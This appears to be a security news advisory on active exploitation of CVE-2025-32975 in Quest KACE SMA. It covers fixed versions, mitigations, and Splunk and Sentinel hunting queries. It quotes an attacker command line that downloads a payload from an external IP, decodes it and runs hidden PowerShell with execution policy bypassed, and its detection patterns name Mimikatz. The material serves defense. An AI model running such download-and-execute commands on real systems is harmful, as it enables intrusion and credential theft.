Summarize with:

Share
Since March 2026, the critical CVE-2025-32975 vulnerability in Quest KACE Systems Management Appliance (SMA) has been linked to active attacks against unpatched, internet-exposed systems. The flaw carries a CVSS score of 10.0 and allows attackers to bypass authentication and impersonate legitimate users, creating a direct path to full administrative control.
That matters because KACE SMA is not a peripheral asset. It is an endpoint management platform with privileged visibility into enterprise systems. In activity observed by Arctic Wolf, attackers used the flaw to seize admin access, fetch payloads from external infrastructure, create new accounts, harvest credentials, and move deeper into victim environments. For defenders, this is a patch-now issue with clear lateral movement and command-and-control risk.
CVE-2025-32975 is a critical-severity vulnerability (CVSS 10.0) in the SSO authentication handling mechanism of Quest KACE SMA. The issue allows attackers to impersonate legitimate users without valid credentials, which can lead to full administrative takeover.
A simplified representation of the post-compromise activity observed by Arctic Wolf looks like this:
bashcurl hxxp://216.126.225.156/<payload> | base64 -d > payload.bin runkbot.exe <arguments> powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\temp\Enable-UpdateServices.ps1
The patch stream from Quest addressed this issue in 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4). The problem is no longer theoretical, however: exploitation is being observed on systems that remain unpatched and publicly reachable.
| Date | Event | Status |
|---|---|---|
| May 27, 2025 | Quest publishes advisory and fixed versions for CVE-2025-32975 and related flaws | ✅ Patch available |
| June 2025 | Public references for the vulnerability begin appearing in disclosure and tracking sources | 📢 Public disclosure |
| Week of March 9, 2026 | Arctic Wolf observes malicious activity consistent with exploitation in customer environments | ⚠️ Initial compromise |
| March 23, 2026 | Public reporting highlights ongoing attacks against unpatched internet-exposed SMA systems | 🔴 Active exploitation |
Critical risk: A compromise of KACE SMA is not just a web admin issue. It can become an account takeover, privileged management plane compromise, and enterprise-wide incident response event.
Update any affected instance to one of Quest’s fixed builds immediately:
13.0.385+13.1.81+13.2.183+14.0.341 Patch 5+14.1.101 Patch 4+If remote access is required, place SMA behind a VPN, hardened reverse access path, or tightly restricted firewall policy. Public internet exposure materially increases risk here.
runkbot.exe activity.Look for:
curl downloads from 216.126.225.156asd.exeSplunk example:
splindex=windows OR index=edr ("runkbot.exe" OR "mimikatz" OR "asd.exe" OR "Enable-UpdateServices.ps1" OR "216.126.225.156") | stats count min(_time) as firstSeen max(_time) as lastSeen by host, user, process_name, parent_process_name, dest_ip, command_line
Microsoft Sentinel example:
kqlDeviceProcessEvents | where ProcessCommandLine has_any ("runkbot.exe", "mimikatz", "Enable-UpdateServices.ps1", "216.126.225.156") | project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName | order by Timestamp desc
Because observed intrusions reached backup infrastructure and domain controllers, validate admin paths into Veeam, Veritas, AD, and similar crown-jewel services. Restrict east-west access where possible.
Arctic Wolf reported activity consistent with the following pattern:
216.126.225.156runkbot.exenet user, net group, and net timeThis combination suggests operators were not stopping at initial access. They were using the appliance as a springboard for persistence, privilege expansion, and deeper operational control.
CVE-2025-32975 is a maximum-severity authentication bypass in a privileged enterprise platform, and attackers are already exploiting unpatched KACE SMA systems in the wild.
✅ Patch status is not protection by itself — systems still exposed and unpatched remain viable targets long after disclosure.
✅ KACE SMA should be treated as high-impact infrastructure — compromise of an endpoint management appliance can cascade into credentials, backups, and domain administration.
✅ Exposure reduction matters — if an SMA instance is reachable from the public internet, the safest assumption is that it deserves immediate validation and remediation.
Patch affected KACE SMA versions immediately, remove public exposure, and investigate for post-compromise activity if the appliance was internet-facing. Delays here increase the chance of administrative takeover and follow-on enterprise compromise.
CVE-2025-32975 is a critical authentication bypass vulnerability in Quest KACE SMA. It affects the product’s SSO authentication handling and can let attackers impersonate legitimate users without valid credentials.
Yes. Arctic Wolf reported malicious activity observed from the week of March 9, 2026 that is consistent with exploitation of CVE-2025-32975 on unpatched, internet-exposed KACE SMA systems.
Affected versions include 13.0.x before 13.0.385, 13.1.x before 13.1.81, 13.2.x before 13.2.183, 14.0.x before 14.0.341 (Patch 5), and 14.1.x before 14.1.101 (Patch 4).
Patch to a fixed version, remove direct internet exposure, review privileged account activity, and hunt for known post-compromise behaviors such as runkbot.exe, hidden PowerShell, Mimikatz, and suspicious outbound retrieval activity.
Written by
Research
A DevOps engineer and cybersecurity enthusiast with a passion for uncovering the latest in zero-day exploits, automation, and emerging tech. I write to share real-world insights from the trenches of IT and security, aiming to make complex topics more accessible and actionable. Whether I’m building tools, tracking threat actors, or experimenting with AI workflows, I’m always exploring new ways to stay one step ahead in today’s fast-moving digital landscape.
Get the latest cybersecurity insights in your inbox.
vulnerabilityCVE-2026-20182 makes Cisco SD-WAN controllers an urgent KEV priority CVE-2026-20182 is not landing as a routine patch bulletin. Cisco says the flaw is already b...
vulnerabilityExim BDAT flaw makes mail servers urgent RCE patch targets CVE-2026-45185 is the kind of bug that forces defenders to remember an old lesson: email infrastructu...
vulnerabilityDirty Frag Linux kernel zero-day gives local users a fast path to root Dirty Frag is the kind of Linux bug defenders worry about because it turns a limited foot...